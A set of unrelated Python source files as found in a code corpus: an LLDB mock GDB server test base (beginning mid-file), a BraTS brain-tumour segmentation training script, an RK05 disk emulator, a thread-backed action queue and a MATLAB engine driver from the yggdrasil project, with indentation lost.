# If there isn't enough data left for a checksum, just remember where
# we left off so we can pick up there the next time around
if i > data_len - 3:
self._receivedDataOffset = i
return None
# If we have enough data remaining for the checksum, extract it and
# compare to the packet contents
packet = data[1:i]
i += 1
try:
check = int(data[i:i + 2], 16)
except ValueError:
raise self.InvalidPacketException("Checksum is not valid hex")
i += 2
if check != checksum(packet):
raise self.InvalidPacketException(
"Checksum %02x does not match content %02x" %
(check, checksum(packet)))
# remove parsed bytes from _receivedData and reset offset so parsing
# can start on the next packet the next time around
self._receivedData = data[i:]
self._receivedDataOffset = 0
return packet
def _handlePacket(self, packet):
if packet is self.PACKET_ACK:
# Ignore ACKs from the client. For the future, we can consider
# adding validation code to make sure the client only sends ACKs
# when it's supposed to.
return
response = ""
# We'll handle the ack stuff here since it's not something any of the
# tests will be concerned about, and it'll get turned off quickly anyway.
if self._shouldSendAck:
self._client.sendall(seven.bitcast_to_bytes('+'))
if packet == "QStartNoAckMode":
self._shouldSendAck = False
response = "OK"
elif self.responder is not None:
# Delegate everything else to our responder
response = self.responder.respond(packet)
# Handle packet framing since we don't want to bother tests with it.
if response is not None:
framed = frame_packet(response)
self._client.sendall(seven.bitcast_to_bytes(framed))
PACKET_ACK = object()
PACKET_INTERRUPT = object()
class InvalidPacketException(Exception):
pass
class GDBRemoteTestBase(TestBase):
"""
Base class for GDB client tests.
This class will setup and start a mock GDB server for the test to use.
It also provides assertPacketLogContains, which simplifies the checking
of packets sent by the client.
"""
NO_DEBUG_INFO_TESTCASE = True
mydir = TestBase.compute_mydir(__file__)
server = None
def setUp(self):
TestBase.setUp(self)
self.server = MockGDBServer()
self.server.start()
def tearDown(self):
# TestBase.tearDown will kill the process, but we need to kill it early
# so its client connection closes and we can stop the server before
# finally calling the base tearDown.
if self.process() is not None:
self.process().Kill()
self.server.stop()
TestBase.tearDown(self)
def createTarget(self, yaml_path):
"""
Create a target by auto-generating the object based on the given yaml
instructions.
This will track the generated object so it can be automatically removed
during tearDown.
"""
yaml_base, ext = os.path.splitext(yaml_path)
obj_path = self.getBuildArtifact(yaml_base)
self.yaml2obj(yaml_path, obj_path)
return self.dbg.CreateTarget(obj_path)
def connect(self, target):
"""
Create a process by connecting to the mock GDB server.
Includes assertions that the process was successfully created.
"""
listener = self.dbg.GetListener()
error = lldb.SBError()
url = "connect://localhost:%d" % self.server.port
process = target.ConnectRemote(listener, url, "gdb-remote", error)
self.assertTrue(error.Success(), error.description)
self.assertTrue(process, PROCESS_IS_VALID)
return process
def assertPacketLogContains(self, packets):
"""
Assert that the mock server's packet log contains the given packets.
The packet log includes all packets sent by the client and received
by the server. This fuction makes it easy to verify that the client
sent the expected packets to the server.
The check does not require that the packets be consecutive, but does
require that they are ordered in the log as they ordered in the arg.
"""
i = 0
j = 0
log = self.server.responder.packetLog
while i < len(packets) and j < len(log):
if log[j] == packets[i]:
i += 1
j += 1
if i < len(packets):
self.fail(u"Did not receive: %s\nLast 10 packets:\n\t%s" %
(packets[i], u'\n\t'.join(log)))
|
train.py | import numpy as np
import tf_models
from sklearn.preprocessing import scale
import tensorflow as tf
from tensorflow.keras.backend import learning_phase
from tensorflow.keras.layers import concatenate, Conv3D
from nibabel import load as load_nii
import os
import argparse
import keras
import glob
import Queue
from threading import Thread # Thread OOMs out for some reason. Have to debug!!
import time
from partition_brats_dir import get_dataset_dirnames
def parse_inputs():
parser = argparse.ArgumentParser(description='train the model')
parser.add_argument('-r', '--root-path', dest='root_path', default='/media/lele/Data/spie/Brats17TrainingData/HGG')
parser.add_argument('-sp', '--save-path', dest='save_path', default='dense24_correction')
parser.add_argument('-ng', '--gpu-ids', dest='gpu_ids', default=[0], nargs='+', type=int)
parser.add_argument('-lp', '--load-path', dest='load_path', default='dense24_correction')
parser.add_argument('-ow', '--offset-width', dest='offset_w', type=int, default=12)
parser.add_argument('-oh', '--offset-height', dest='offset_h', type=int, default=12)
parser.add_argument('-oc', '--offset-channel', dest='offset_c', nargs='+', type=int, default=12)
parser.add_argument('-ws', '--width-size', dest='wsize', type=int, default=38)
parser.add_argument('-hs', '--height-size', dest='hsize', type=int, default=38)
parser.add_argument('-cs', '--channel-size', dest='csize', type=int, default=38)
parser.add_argument('-ps', '--pred-size', dest='psize', type=int, default=12)
parser.add_argument('-bs', '--batch-size', dest='batch_size', type=int, default=2)
parser.add_argument('-e', '--num-epochs', dest='num_epochs', type=int, default=5)
parser.add_argument('-c', '--continue-training', dest='continue_training', type=bool, default=False)
parser.add_argument('-mn', '--model_name', dest='model_name', type=str, default='dense24')
parser.add_argument('-nc', '--n4correction', dest='correction', type=bool, default=False)
return vars(parser.parse_args())
options = parse_inputs()
def acc_tf(y_pred, y_true):
correct_prediction = tf.equal(tf.cast(tf.argmax(y_pred, -1), tf.int32), tf.cast(tf.argmax(y_true, -1), tf.int32))
return 100 * tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
def get_patches_3d(data, labels, centers, hsize, wsize, csize, psize, preprocess=True):
"""
:param data: 4D nparray (h, w, c, ?)
:param centers:
:param hsize:
:param wsize:
:param csize:
:return:
"""
patches_x, patches_y = [], []
offset_p = (hsize - psize) / 2
for i in range(len(centers[0])):
h, w, c = centers[0, i], centers[1, i], centers[2, i]
h_beg = min(max(0, h - hsize / 2), 240 - hsize)
w_beg = min(max(0, w - wsize / 2), 240 - wsize)
c_beg = min(max(0, c - csize / 2), 155 - csize)
ph_beg = h_beg + offset_p
pw_beg = w_beg + offset_p
pc_beg = c_beg + offset_p
vox = data[h_beg:h_beg + hsize, w_beg:w_beg + wsize, c_beg:c_beg + csize, :]
vox_labels = labels[ph_beg:ph_beg + psize, pw_beg:pw_beg + psize, pc_beg:pc_beg + psize]
patches_x.append(vox)
patches_y.append(vox_labels)
return np.array(patches_x), np.array(patches_y)
def positive_ratio(x):
return float(np.sum(np.greater(x, 0))) / np.prod(x.shape)
def norm(image):
image = np.squeeze(image)
image_nonzero = image[np.nonzero(image)]
return (image - image_nonzero.mean()) / image_nonzero.std()
def segmentation_loss(y_true, y_pred, n_classes):
y_true = tf.reshape(y_true, (-1, n_classes))
y_pred = tf.reshape(y_pred, (-1, n_classes))
return tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_true,
logits=y_pred))
def vox_preprocess(vox):
vox_shape = vox.shape
vox = np.reshape(vox, (-1, vox_shape[-1]))
vox = scale(vox, axis=0)
return np.reshape(vox, vox_shape)
def one_hot(y, num_classes):
y_ = np.zeros([len(y), num_classes])
y_[np.arange(len(y)), y] = 1
return y_
def dice_coef_np(y_true, y_pred, num_classes):
"""
:param y_true: sparse labels
:param y_pred: sparse labels
:param num_classes: number of classes
:return:
"""
y_true = y_true.astype(int)
y_pred = y_pred.astype(int)
y_true = y_true.flatten()
y_true = one_hot(y_true, num_classes)
y_pred = y_pred.flatten()
y_pred = one_hot(y_pred, num_classes)
intersection = np.sum(y_true * y_pred, axis=0)
return (2. * intersection) / (np.sum(y_true, axis=0) + np.sum(y_pred, axis=0))
def vox_generator(all_files, n_pos, n_neg):
path = options['root_path']
while 1:
for file in all_files:
coll = glob.glob(os.path.join(path, file)+'/*')
for c in coll:
if 'flair.' in c or 'flair_corrected.' in c:
flair_path = c
if 't1.' in c or 't1_corrected.' in c:
t1_path = c
if 't2.' in c or 't2_corrected.' in c:
t2_path = c
if 't1ce.'in c or 't1ce_corrected.' in c:
t1ce_path = c
flair = load_nii(flair_path).get_data()
t2 = load_nii(t2_path).get_data()
t1 = load_nii(t1_path).get_data()
t1ce = load_nii(t1ce_path).get_data()
data_norm = np.array([norm(flair), norm(t2), norm(t1), norm(t1ce)])
data_norm = np.transpose(data_norm, axes=[1, 2, 3, 0])
labels = load_nii(os.path.join(path, file, file+'_seg.nii.gz')).get_data()
foreground = np.array(np.where(labels > 0))
background = np.array(np.where((labels == 0) & (flair > 0)))
# n_pos = int(foreground.shape[1] * discount)
foreground = foreground[:, np.random.permutation(foreground.shape[1])[:n_pos]]
background = background[:, np.random.permutation(background.shape[1])[:n_neg]]
centers = np.concatenate((foreground, background), axis=1)
centers = centers[:, np.random.permutation(n_neg+n_pos)]
yield data_norm, labels, centers
def label_transform(y, nlabels):
return [
keras.utils.to_categorical(np.copy(y).astype(dtype=np.bool),
num_classes=2).reshape([y.shape[0], y.shape[1], y.shape[2], y.shape[3], 2]),
keras.utils.to_categorical(y,
num_classes=nlabels).reshape([y.shape[0], y.shape[1], y.shape[2], y.shape[3], nlabels])
]
def train():
NUM_EPOCHS = options['num_epochs']
LOAD_PATH = options['load_path']
SAVE_PATH = options['save_path']
PSIZE = options['psize']
HSIZE = options['hsize']
WSIZE = options['wsize']
CSIZE = options['csize']
model_name= options['model_name']
BATCH_SIZE = options['batch_size']
continue_training = options['continue_training']
lr = tf.Variable(5e-4, trainable=False)
files = []
num_labels = 5
files = get_dataset_dirnames(options['root_path'])
print '%d training samples' % len(files)
flair_t2_node = tf.placeholder(dtype=tf.float32, shape=(None, HSIZE, WSIZE, CSIZE, 2))
t1_t1ce_node = tf.placeholder(dtype=tf.float32, shape=(None, HSIZE, WSIZE, CSIZE, 2))
flair_t2_gt_node = tf.placeholder(dtype=tf.int32, shape=(None, PSIZE, PSIZE, PSIZE, 2))
t1_t1ce_gt_node = tf.placeholder(dtype=tf.int32, shape=(None, PSIZE, PSIZE, PSIZE, 5))
if model_name == 'dense48':
flair_t2_15, flair_t2_27 = tf_models.BraTS2ScaleDenseNetConcat_large(input=flair_t2_node, name='flair')
t1_t1ce_15, t1_t1ce_27 = tf_models.BraTS2ScaleDenseNetConcat_large(input=t1_t1ce_node, name='t1')
elif model_name == 'no_dense':
flair_t2_15, flair_t2_27 = tf_models.PlainCounterpart(input=flair_t2_node, name='flair')
t1_t1ce_15, t1_t1ce_27 = tf_models.PlainCounterpart(input=t1_t1ce_node, name='t1')
elif model_name == 'dense24':
flair_t2_15, flair_t2_27 = tf_models.BraTS2ScaleDenseNetConcat(input=flair_t2_node, name='flair')
t1_t1ce_15, t1_t1ce_27 = tf_models.BraTS2ScaleDenseNetConcat(input=t1_t1ce_node, name='t1')
else:
print' No such model name '
t1_t1ce_15 = concatenate([t1_t1ce_15, flair_t2_15])
t1_t1ce_27 = concatenate([t1_t1ce_27, flair_t2_27])
flair_t2_15 = Conv3D(2, kernel_size=1, strides=1, padding='same', name='flair_t2_15_cls')(flair_t2_15)
flair_t2_27 = Conv3D(2, kernel_size=1, strides=1, padding='same', name='flair_t2_27_cls')(flair_t2_27)
t1_t1ce_15 = Conv3D(num_labels, kernel_size=1, strides=1, padding='same', name='t1_t1ce_15_cls')(t1_t1ce_15)
t1_t1ce_27 = Conv3D(num_labels, kernel_size=1, strides=1, padding='same', name='t1_t1ce_27_cls')(t1_t1ce_27)
flair_t2_score = flair_t2_15[:, 13:25, 13:25, 13:25, :] + \
flair_t2_27[:, 13:25, 13:25, 13:25, :]
t1_t1ce_score = t1_t1ce_15[:, 13:25, 13:25, 13:25, :] + \
t1_t1ce_27[:, 13:25, 13:25, 13:25, :]
loss = segmentation_loss(flair_t2_gt_node, flair_t2_score, 2) + \
segmentation_loss(t1_t1ce_gt_node, t1_t1ce_score, 5)
acc_flair_t2 = acc_tf(y_pred=flair_t2_score, y_true=flair_t2_gt_node)
acc_t1_t1ce = acc_tf(y_pred=t1_t1ce_score, y_true=t1_t1ce_gt_node)
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
optimizer = tf.train.AdamOptimizer(learning_rate=lr).minimize(loss)
saver = tf.train.Saver(max_to_keep=15)
data_gen_train = vox_generator(all_files=files, n_pos=200, n_neg=200)
def single_gpu_fn(nb, gpuname='/device:GPU:0', q=None): # q - result queue
with tf.device(gpuname):
offset_batch = min(nb * BATCH_SIZE, centers.shape[1] - BATCH_SIZE)
data_batch, label_batch = get_patches_3d(data, labels, centers[:, offset_batch:offset_batch + BATCH_SIZE], HSIZE, WSIZE, CSIZE, PSIZE, False)
label_batch = label_transform(label_batch, 5)
_, l, acc_ft, acc_t1c = sess.run(fetches=[optimizer, loss, acc_flair_t2, acc_t1_t1ce],
feed_dict={flair_t2_node: data_batch[:, :, :, :, :2],
t1_t1ce_node: data_batch[:, :, :, :, 2:],
flair_t2_gt_node: label_batch[0],
t1_t1ce_gt_node: label_batch[1],
})
n_pos_sum = np.sum(np.reshape(label_batch[0], (-1, 2)), axis=0)
return acc_ft, acc_t1c, l, n_pos_sum
if not os.path.isdir('chkpts'):
os.mkdir('chkpts')
os.mkdir('chkpts/0')
save_point = 0
else:
save_point = sorted([int(x.split('/')[-1]) for x in glob.glob('chkpts/*')])[-1] + 1
os.mkdir('chkpts/%d'%save_point)
with tf.Session() as sess:
if continue_training:
saver.restore(sess, LOAD_PATH)
else:
sess.run(tf.global_variables_initializer())
for ei in range(NUM_EPOCHS):
for pi in range(len(files)):
acc_pi, loss_pi = [], []
data, labels, centers = data_gen_train.next()
n_batches = int(np.ceil(float(centers.shape[1]) / BATCH_SIZE))
threads = []
for nb in range(0, n_batches, len(options['gpu_ids'])):
for gi, x in enumerate(options['gpu_ids']):
#t = time.time()
acc_ft, acc_t1c, l, n_pos_sum = single_gpu_fn(nb+gi)
acc_pi.append([acc_ft, acc_t1c])
loss_pi.append(l)
'''
q = [Queue.Queue() for _ in range(4)]
t = Thread(target=single_gpu_fn, args=(nb+gi,'/device:GPU:%d'%x, q))
threads.append(t)
for th in threads:
th.start()
for th in threads:
th.join()
threads = []
queue_avg = lambda x, i: np.average(list(x[i].queue))
acc_ft, acc_t1c, l, n_pos_sum = queue_avg(q, 0), queue_avg(q, 1), queue_avg(q, 2), np.mean(list(q[3].queue), axis=0)
'''
#print ('TIME: %.4f'%(time.time()-t))
print 'epoch-patient: %d, %d, iter: %d-%d, p%%: %.4f, loss: %.4f, acc_flair_t2: %.2f%%, acc_t1_t1ce: %.2f%%' % \
(ei + 1, pi + 1, nb + 1, n_batches, n_pos_sum[1]/float(np.sum(n_pos_sum)), l, acc_ft, acc_t1c)
print 'patient loss: %.4f, patient acc: %.4f' % (np.mean(loss_pi), np.mean(acc_pi))
saver.save(sess, 'chkpts/'+str(save_point)+'/'+SAVE_PATH+'.ckpt', global_step=ei)
print 'model saved'
lr = tf.train.exponential_decay(lr, ei, 1, 0.25, staircase=True)
if __name__ == '__main__':
train()
|
rk05.py | #!/usr/bin/env python3
# This is a translation of Julius Schmidt's PDP-11 emulator in JavaScript.
# You can run that one in your browser: http://pdp11.aiju.de
# (c) 2011, Julius Schmidt, JavaScript implementation, MIT License
# (c) 2019, Andriy Makukha, ported to Python 3, MIT License
# Version 6 Unix (in the disk image) is available under the four-clause BSD license.
import time, array, threading
from interrupt import Interrupt
from unix_v6_fs import UnixV6FileSystem
class System:
def __init__(self):
self.memory = array.array('H', bytearray(256*1024*[0])) # 16-bit unsigned values
print ('Memory initialized')
def interrupt(self, intr, y):
pass
def event(self, *evn):
# 'rkbusy' = document.getElementById('rkbusy').style.display = '';
# 'rkready' = document.getElementById('rkbusy').style.display = 'none';
pass
def panic(self, msg):
print ('PANIC: ', msg)
class RK05:
'''RK05 was a magnetic disk drive produces by DEC. It stored approximately 2.5 MB on
a 14 inch front-loading removable disk cartridge.'''
EXPECTED_IMAGE_LENGTH = 2077696
IMAGE_FILENAME = 'rk0.img'
# Error codes
RKOVR = (1<<14)
RKNXD = (1<<7)
RKNXC = (1<<6)
RKNXS = (1<<5)
def __init__(self, system):
self.system = system
#self.reinit()
def reinit(self):
# rkinit
self.load_image(RK05.IMAGE_FILENAME)
# Current "physical" position of the head
self.drive = 0
self.sector = 0
self.surface = 0
self.cylinder = 0
self.reset()
def save_image(self, filename):
open(filename, 'wb').write(self.disk)
def load_image(self, filename):
self.disk = bytearray(open(filename, 'rb').read())
if len(self.disk) != RK05.EXPECTED_IMAGE_LENGTH:
self.system.panic('unexpected image length {} != {}'.format(len(self.disk), RK05.EXPECTED_IMAGE_LENGTH))
print ('Disk image loaded:', len(self.disk))
# TODO: extend image with free bytes, but also add those blocks to the free blocks chain
#max_bytes = 0o313*0o14*2*512 # 4872 blocks, 2494464 bytes
#if len(self.disk) < max_bytes:
# extend_by = max_bytes - len(self.disk)
# self.disk.extend(bytearray(extend_by*[0]))
# print (' - free space:', extend_by)
def start_sync_thread(self, unix_dir: 'path', local_dir: 'path'):
self._unix_dir = unix_dir
self._local_dir = local_dir
self.sync_running = threading.Event()
self.sync_finished = threading.Event()
self.sync_finished.clear()
self.sync_thread = threading.Thread(target=self.sync_method)
self.sync_thread.daemon = True
self.sync_thread.start()
def sync_method(self):
'''The purpose of this thread is to:
1) exectute `sync` command before taking the filesystem snapshot
2) pass the syncing work to the filesystem class using that snapshot
3) wait for the syncing to finish, then take modified filesystem and replace the current one if Unix is not live
'''
if self.system.terminal.prompt_cnt > 0:
self.sync_running.clear()
self.system.terminal.queue_command('sync', self.sync_prompt)
self.sync_running.wait()
# TODO: check if filesystem is locked
try:
disk_snapshot = bytes(self.disk)
self.fs = UnixV6FileSystem(disk_snapshot)
self.fs.start_sync_thread(self._unix_dir, self._local_dir, self.system.terminal)
self.fs.sync_finished.wait()
# Replace current disk image with the synced one if Unix is not live
if self.system.terminal.prompt_cnt == 0:
self.fs.f.seek(0)
disk = self.fs.f.read()
if hash(disk_snapshot) != hash(disk) and disk_snapshot != disk:
self.disk = bytearray(disk)
self.system.writedebug('Disk image replaced with a synced one\n')
msg = 'Unix directory {} synced with local directory {}\n'.format(self._unix_dir, self._local_dir)
self.system.writedebug(msg)
except Exception as e:
raise e
def sync_prompt(self, last_printed):
self.sync_running.set()
def reset(self):
# Reset registers to default values
self.DS = (1 << 11) | (1 << 7) | (1 << 6)
self.ER = 0
self.CS = 1 << 7
self.WC = 0
self.BA = 0
self.DB = 0
def read16(self, a):
if a == 0o777400:
return self.DS
elif a ==0o0777402:
return self.ER
elif a == 0o0777404:
return self.CS | ((self.BA & 0x30000) >> 12)
elif a == 0o0777406:
return self.WC
elif a == 0o0777410:
return self.BA & 0xFFFF
elif a == 0o0777412:
return (self.sector) | (self.surface << 4) | (self.cylinder << 5) | (self.drive << 13)
else:
self.system.panic('invalid read')
def notready(self):
#self.system.event('rkbusy') # TODO
self.DS &= ~(1<<6)
self.CS &= ~(1<<7)
def ready(self):
#self.system.event('rkready') # TODO
self.DS |= 1<<6
self.CS |= 1<<7
def error(self, code):
self.ready()
self.ER |= code
self.CS |= (1<<15) | (1<<14)
if code == RK05.RKOVR:
msg = "operation overflowed the disk"
elif code == RK05.RKNXD:
msg = "invalid disk accessed"
elif code == RK05.RKNXC:
msg = "invalid cylinder accessed"
elif code == RK05.RKNXS:
msg = "invalid sector accessed"
self.system.panic(msg)
def rwsec(self, write):
'''Read/write entire sector (512 bytes) to/from memory'''
if self.drive != 0: self.error(RK05.RKNXD)
if self.cylinder > 0o312: self.error(RK05.RKNXC)
if self.sector > 0o13: self.error(RK05.RKNXS)
pos = (self.cylinder * 24 + self.surface * 12 + self.sector) * 512
for i in range(0, 256):
if not self.WC: break
if write:
# Words are 16-bit
val = self.system.memory[self.BA >> 1]
self.disk[pos] = val & 0xFF
self.disk[pos+1] = (val >> 8) & 0xFF
else:
self.system.memory[self.BA >> 1] = self.disk[pos] | (self.disk[pos+1] << 8)
self.BA += 2
self.WC = (self.WC + 1) & 0xFFFF
pos += 2
# Check for overflow
self.sector += 1
if self.sector > 0o13:
self.sector = 0
self.surface += 1
if self.surface > 1:
self.surface = 0
self.cylinder += 1
if self.cylinder > 0o312:
self.error(RK05.RKOVR)
if self.WC:
#setTimeout('rkrwsec('+t+')', 3);
#time.sleep(0.003) # seems unnecessary
self.rwsec(write)
else:
self.ready()
if self.CS & (1<<6):
self.system.interrupt(Interrupt.RK, 5)
def go(self):
op = (self.CS & 0xF) >> 1
if op == 0:
self.system.writedebug('WARNING: resetting the drive via op == 0\n')
self.reset()
elif op == 1:
self.notready()
#setTimeout('rkrwsec(true)', 3)
time.sleep(0.003) # TODO: do we need it?
self.rwsec(True)
elif op == 2:
self.notready()
#setTimeout('rkrwsec(false)', 3)
time.sleep(0.003) # TODO: do we need it?
self.rwsec(False)
else:
self.system.panic('unimplemented RK05 operation 0x{:x}'.format(op))
def write16(self, a, v):
if a in [0o777400, 0o777402]: return
elif a == 0o777404:
self.BA = (self.BA & 0xFFFF) | ((v & 0o60) << 12)
v &= 0o17517 # writable bits
self.CS &= ~0o17517
self.CS |= v & ~1 # dont set GO bit
if v & 1:
self.go()
elif a == 0o777406:
self.WC = v
elif a == 0o777410:
self.BA = (self.BA & 0x30000) | v
elif a == 0o777412:
self.drive = v >> 13
self.cylinder = (v >> 5) & 0o377
self.surface = (v >> 4) & 1
self.sector = v & 15
else:
self.system.panic('invalid write')
if __name__=='__main__':
sys = System()
rk05 = RK05(sys)
|
action_queue.py | '''ActionQueue: a background worker that manages its own worker thread automatically.'''
from threading import Thread, Lock, Event
from queue import Queue, Empty
__all__ = [
'ActionQueue',
]
class ActionQueue:
'''A background worker that manages its own worker thread automatically.
Enqueue work items using .put(). Work items are functions that do not
take any parameters and return None.
.put() returns immediately. The work items are processed in a background
thread, in the order in which they arrived. Only one work item is processed
at a time.
The background thread is started when there is work to do, and teared down
when the queue is empty.
'''
def __init__(self):
self._queue = Queue()
self._thread = None
self._running = Event()
self._startstop_lock = Lock()
def put(self, action):
'''Put an action into the queue.
Parameters:
action (func): a callable without params. The return value is not used.
'''
with self._startstop_lock:
self._queue.put(action)
if not self._running.is_set():
self._thread = Thread(target=self._run_worker, name='ActionQueue')
self._thread.start()
self._running.wait()
def _run_worker(self):
self._running.set()
while True:
with self._startstop_lock:
try:
action = self._queue.get_nowait()
except Empty:
self._running.clear()
return
action()
|
MatlabModelDriver.py | import subprocess
import uuid as uuid_gen
import logging
from datetime import datetime
import os
import glob
import psutil
import warnings
import weakref
import io as sio
from yggdrasil import tools, platform, serialize
from yggdrasil.languages import get_language_dir
from yggdrasil.config import ygg_cfg
from yggdrasil.drivers.InterpretedModelDriver import InterpretedModelDriver
from yggdrasil.tools import TimeOut, sleep
logger = logging.getLogger(__name__)
try: # pragma: matlab
disable_engine = ygg_cfg.get('matlab', 'disable_engine', 'False').lower()
if platform._is_win or (disable_engine == 'true'):
_matlab_engine_installed = False
if not tools.is_subprocess():
logger.debug("matlab.engine disabled")
else:
import matlab.engine
_matlab_engine_installed = True
except ImportError: # pragma: no matlab
logger.debug("Could not import matlab.engine. "
+ "Matlab support for using a sharedEngine will be disabled.")
_matlab_engine_installed = False
_top_lang_dir = get_language_dir('matlab')
_compat_map = {
'R2015b': ['2.7', '3.3', '3.4'],
'R2017a': ['2.7', '3.3', '3.4', '3.5'],
'R2017b': ['2.7', '3.3', '3.4', '3.5', '3.6'],
'R2018b': ['2.7', '3.3', '3.4', '3.5', '3.6']}
def kill_all():
r"""Kill all Matlab shared engines."""
if platform._is_win: # pragma: windows
os.system(('taskkill /F /IM matlab.engine.shareEngine /T'))
else:
os.system(('pkill -f matlab.engine.shareEngine'))
def locate_matlab_engine_processes(): # pragma: matlab
r"""Get all of the active matlab sharedEngine processes.
Returns:
list: Active matlab sharedEngine processes.
"""
out = []
for p in psutil.process_iter():
p.info = p.as_dict(attrs=['name', 'pid', 'cmdline'])
if (((p.info['name'] == 'MATLAB')
and ('matlab.engine.shareEngine' in p.info['cmdline']))):
out.append(p) # p.info['pid'])
return out
def is_matlab_running():
r"""Determine if there is a Matlab engine running.
Returns:
bool: True if there is a Matlab engine running, False otherwise.
"""
if not _matlab_engine_installed: # pragma: no matlab
out = False
else: # pragma: matlab
out = (len(matlab.engine.find_matlab()) != 0)
return out
def locate_matlabroot(): # pragma: matlab
r"""Find directory that servers as matlab root.
Returns:
str: Full path to matlabroot directory.
"""
return MatlabModelDriver.get_matlab_info()[0]
def install_matlab_engine(): # pragma: matlab
r"""Install the MATLAB engine API for Python."""
if not _matlab_engine_installed:
mtl_root = locate_matlabroot()
mtl_setup = os.path.join(mtl_root, 'extern', 'engines', 'python')
cmd = 'python setup.py install'
result = subprocess.check_output(cmd, cwd=mtl_setup)
print(result)
def start_matlab_engine(skip_connect=False, timeout=None): # pragma: matlab
r"""Start a Matlab shared engine session inside a detached screen
session.
Args:
skip_connect (bool, optional): If True, the engine is not connected.
Defaults to False.
timeout (int, optional): Time (in seconds) that should be waited for
Matlab to start up. Defaults to None and is set from the config
option ('matlab', 'startup_waittime_s').
Returns:
tuple: Information on the started session including the name of the
screen session running matlab, the created engine object, the name
of the matlab session, and the matlab engine process.
Raises:
RuntimeError: If Matlab is not installed.
"""
if not _matlab_engine_installed: # pragma: no matlab
raise RuntimeError("Matlab engine is not installed.")
if timeout is None:
timeout = float(ygg_cfg.get('matlab', 'startup_waittime_s', 10))
old_process = set(locate_matlab_engine_processes())
old_matlab = set(matlab.engine.find_matlab())
screen_session = str('ygg_matlab' + datetime.today().strftime("%Y%j%H%M%S")
+ '_%d' % len(old_matlab))
try:
args = ['screen', '-dmS', screen_session, '-c',
os.path.join(_top_lang_dir, 'matlab_screenrc'),
'matlab', '-nodisplay', '-nosplash', '-nodesktop', '-nojvm',
'-r', '"matlab.engine.shareEngine"']
subprocess.call(' '.join(args), shell=True)
T = TimeOut(timeout)
while ((len(set(matlab.engine.find_matlab()) - old_matlab) == 0)
and not T.is_out):
logger.debug('Waiting for matlab engine to start')
sleep(1) # Usually 3 seconds
except KeyboardInterrupt: # pragma: debug
args = ['screen', '-X', '-S', screen_session, 'quit']
subprocess.call(' '.join(args), shell=True)
raise
if (len(set(matlab.engine.find_matlab()) - old_matlab) == 0): # pragma: debug
raise Exception("start_matlab timed out at %f s" % T.elapsed)
new_matlab = list(set(matlab.engine.find_matlab()) - old_matlab)[0]
new_process = list(set(locate_matlab_engine_processes()) - old_process)[0]
# Connect to the engine
matlab_engine = None
if not skip_connect:
matlab_engine = connect_matlab_engine(new_matlab, first_connect=True)
return screen_session, matlab_engine, new_matlab, new_process
def connect_matlab_engine(matlab_session, first_connect=False): # pragma: matlab
r"""Connect to Matlab engine.
Args:
matlab_session (str): Name of the Matlab session that should be
connected to.
first_connect (bool, optional): If True, this is the first time
Python is connecting to the Matlab shared engine and certain
environment variables should be set. Defaults to False.
Returns:
MatlabEngine: Matlab engine that was connected.
"""
matlab_engine = matlab.engine.connect_matlab(matlab_session)
matlab_engine.eval('clear classes;', nargout=0)
err = sio.StringIO()
try:
matlab_engine.eval("YggInterface('YGG_MSG_MAX');", nargout=0,
stderr=err)
except BaseException:
for x in MatlabModelDriver.paths_to_add:
matlab_engine.addpath(x, nargout=0)
matlab_engine.eval("os = py.importlib.import_module('os');", nargout=0)
return matlab_engine
def stop_matlab_engine(screen_session, matlab_engine, matlab_session,
matlab_process, keep_engine=False): # pragma: matlab
r"""Stop a Matlab shared engine session running inside a detached screen
session.
Args:
screen_session (str): Name of the screen session that the shared
Matlab session was started in.
matlab_engine (MatlabEngine): Matlab engine that should be stopped.
matlab_session (str): Name of Matlab session that the Matlab engine is
connected to.
matlab_process (psutil.Process): Process running the Matlab shared engine.
keep_engine (bool, optional): If True, the references to the engine will be
removed so it is not deleted. Defaults to False.
Raises:
RuntimeError: If Matlab is not installed.
"""
if not _matlab_engine_installed: # pragma: no matlab
raise RuntimeError("Matlab engine is not installed.")
if keep_engine and (matlab_engine is not None):
if '_matlab' in matlab_engine.__dict__:
matlab_engine.quit()
return
# Remove weakrefs to engine to prevent stopping engine more than once
if matlab_engine is not None:
# Remove weak references so engine not deleted on exit
eng_ref = weakref.getweakrefs(matlab_engine)
for x in eng_ref:
if x in matlab.engine._engines:
matlab.engine._engines.remove(x)
# Either exit the engine or remove its reference
if matlab_session in matlab.engine.find_matlab():
try:
matlab_engine.eval('exit', nargout=0)
except BaseException:
pass
else: # pragma: no cover
matlab_engine.__dict__.pop('_matlab', None)
# Stop the screen session containing the Matlab shared session
if screen_session is not None:
if matlab_session in matlab.engine.find_matlab():
os.system(('screen -X -S %s quit') % screen_session)
T = TimeOut(5)
while ((matlab_session in matlab.engine.find_matlab())
and not T.is_out):
logger.debug("Waiting for matlab engine to exit")
sleep(1)
if (matlab_session in matlab.engine.find_matlab()): # pragma: debug
if matlab_process is not None:
matlab_process.terminate()
logger.error("stop_matlab_engine timed out at %f s. " % T.elapsed
+ "Killed Matlab sharedEngine process.")
class MatlabProcess(tools.YggClass): # pragma: matlab
r"""Add features to mimic subprocess.Popen while running Matlab function
asynchronously.
Args:
target (func): Matlab function that should be called.
args (list, tuple): Arguments that should be passed to target.
kwargs (dict, optional): Keyword arguments that should be passed to
target. Defaults to empty dict.
name (str, optional): A name for the process. Generated if not provided.
matlab_engine (MatlabEngine, optional): MatlabEngine that should be used
to get errors. Defaults to None and errors will not be recovered
unless passed through stdout and stderr before shutdown.
Attributes:
stdout (StringIO): File like string buffer that stdout from target will
be written to.
stderr (StringIO): File like string buffer that stderr from target will
be written to.
target (func): Matlab function that should be called.
args (list, tuple): Arguments that should be passed to target.
kwargs (dict): Keyword arguments that should be passed to target.
future (MatlabFutureResult): Future result from async function. This
will be None until start is called.
matlab_engine (MatlabEngine): MatlabEngine that should be used to get
errors.
Raises:
RuntimeError: If Matlab is not installed.
"""
def __init__(self, target, args, kwargs=None, name=None, matlab_engine=None):
if not _matlab_engine_installed: # pragma: no matlab
raise RuntimeError("Matlab engine is not installed.")
if kwargs is None:
kwargs = {}
self.stdout = sio.StringIO()
self.stderr = sio.StringIO()
self._stdout_line = None
self._stderr_line = None
self.target = target
self.args = args
self.kwargs = kwargs
self.kwargs.update(nargout=0, stdout=self.stdout, stderr=self.stderr)
self.kwargs['async'] = True # For python 3.7 where async is reserved
self.future = None
self.matlab_engine = matlab_engine
self._returncode = None
super(MatlabProcess, self).__init__(name)
